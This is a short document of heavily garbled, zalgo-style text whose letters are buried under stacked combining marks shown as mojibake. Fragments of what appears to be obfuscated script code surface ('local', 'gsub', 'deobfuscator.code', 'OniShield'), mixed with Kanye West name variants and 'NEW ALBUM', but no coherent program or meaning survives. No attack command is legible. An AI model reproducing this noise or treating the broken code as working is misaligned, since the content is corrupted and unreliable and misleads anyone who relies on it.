ÌŸÌ—Ì­Ì®Ì§Ì¹Ì¹Ì˜Í”wÌ¸Í›Í‘Ì‰Í˜Ì¨Ì§Ì Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌ,Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­.$Ì·Í›Í‚ÍÌ†ÍÍÌ’Í’Ì¦NÌµÌŠÍ—Ì¾ÍŠÍ„ÍŽÌ·Ì‘Í‚Ì Ì¢Í‰Ì£ÌžÌ°ÍÌ«EÌµÍÌ³ÌºÍÌ£ÌžÌ­Í”ÍÌ¢ÍˆÌµÌ‡ÍŠÌˆÍ’Ì¹Ì Ì¦Ì±Ì°Ì Ì¦WÌ´Í‚ÍÌŒÌ½Ì¾Ì€Ì–Í“ÌºÌ¯Ì™Ì¶ÌƒÌÌ³ÌºÍšÌªÍ‰Ì©AÌ¸Í Ì”ÌÍ™Ì°Ì«ÌžÌ·Í‘Í—ÌªÌ§ÌœÍ”ÍˆÌÌ­LÌ´Ì„Ì”ÌÌÍ‹ÌŒÍ‚ÌÍ“Ì™ÍœÌ¡Ì£ÍŽÌ®Ì°Ì¶Ì€Í„Ì•ÌÍ—Ì›ÌÌ¬Ì¹Ì—Ì²Ì­Í‡Í–BÌµÌƒÍŒÌ•Í˜Ì¹Í–Ì²Í‰Í–Í•Ì¸Ì‡Í‚Ì©Í…Í•ÍˆÌ²Ì³Ì³ÍŽÍ”Ì UÌ·Í˜Ì½ÌŒÌˆÍÍŽÍ™Ì·Í˜ÌšÌ­MÌ¶Í˜Í‚ÍÌ­ÌªÍ‰ÌºÌ¬Ì£Í“$,gÌµÍÌ‘ÍÌ¿Í‘ÍˆÌœÌ³Ì¹ÌžÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹;Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢_Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­[Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨], Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥ [ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì´Í—ÌŽÌÌ‹ÌšÌ½Í•Í‰Ì¹ÍœÍœÌ¬Ì»mÌ¶Í›Ì»Ì–Ì¼Ì«ÌŸÌ´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥Ì·ÍŠÌ‘ÌÌ½Ì‚Ì ÌŸÌ—Ì­Ì®Ì§Ì¹Ì¹Ì˜Í”wÌ¸Í›Í‘Ì‰Í˜Ì¨Ì§Ì Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌ,Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­] == "Ì·Í›Í‚ÍÌ†ÍÍÌ’Í’Ì¦NÌµÌŠÍ—Ì¾ÍŠÍ„ÍŽÌ·Ì‘Í‚Ì Ì¢Í‰Ì£ÌžÌ°ÍÌ«EÌµÍÌ³ÌºÍÌ£ÌžÌ­Í”ÍÌ¢ÍˆÌµÌ‡ÍŠÌˆÍ’Ì¹Ì Ì¦Ì±Ì°Ì Ì¦WÌ´Í‚ÍÌŒÌ½Ì¾Ì€Ì–Í“ÌºÌ¯Ì™ Ì¶ÌƒÌÌ³ÌºÍšÌªÍ‰Ì©AÌ¸Í Ì”ÌÍ™Ì°Ì«ÌžÌ·Í‘Í—ÌªÌ§ÌœÍ”ÍˆÌÌ­LÌ´Ì„Ì”ÌÌÍ‹ÌŒÍ‚ÌÍ“Ì™ÍœÌ¡Ì£ÍŽÌ®Ì°Ì¶Ì€Í„Ì•ÌÍ—Ì›ÌÌ¬Ì¹Ì—Ì²Ì­Í‡Í–BÌµÌƒÍŒÌ•Í˜Ì¹Í–Ì²Í‰Í–Í•Ì¸Ì‡Í‚Ì©Í…Í•ÍˆÌ²Ì³Ì³ÍŽÍ”Ì UÌ·Í˜Ì½ÌŒÌˆÍÍŽÍ™Ì·Í˜ÌšÌ­MÌ¶Í˜Í‚ÍÌ­ÌªÍ‰ÌºÌ¬Ì£Í“" Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢Ì·ÌÌ“Í’ÍŒÍ Ì¨Ì»fÌ¸Í„Í›ÌœÍˆÍ•Ì© {Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹Ì·ÌÌ“Í’ÍŒÍ Ì¨Ì»fÌ¸Í„Í›ÌœÍˆÍ•Ì©Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥.ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ = Ì¶Ì‚Í„ÌÌŽÍ›ÌÍ‹Ì›Í„Ì³Ì²ÌÌ Í“Í–OÌ·ÌÌ‰Ì„ÌŽÌˆÍÌªÌ®Ì¤Ì¢Ì¥ÌºÌ°Ì°ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢ÌµÌ†Ì…ÌÌ—Ì™Ì Ì­Ì˜SÌ¶ÌÍ†Ì¿Ì†Í€Ì ÌžÌ˜Ì¦Ì¯Ì¼Ì£Ì¥Ì©Ì®Ì·Í’Ì€Ì¥Í‰Ì ÍŽÌ°ÍšÌ¯Í”hÌ·Ì’Í“ÍœÌ«Ì¬ÍšÌ¹Í“Í…Ì¢Ì²Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­Ìº_Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦,Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨.ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì 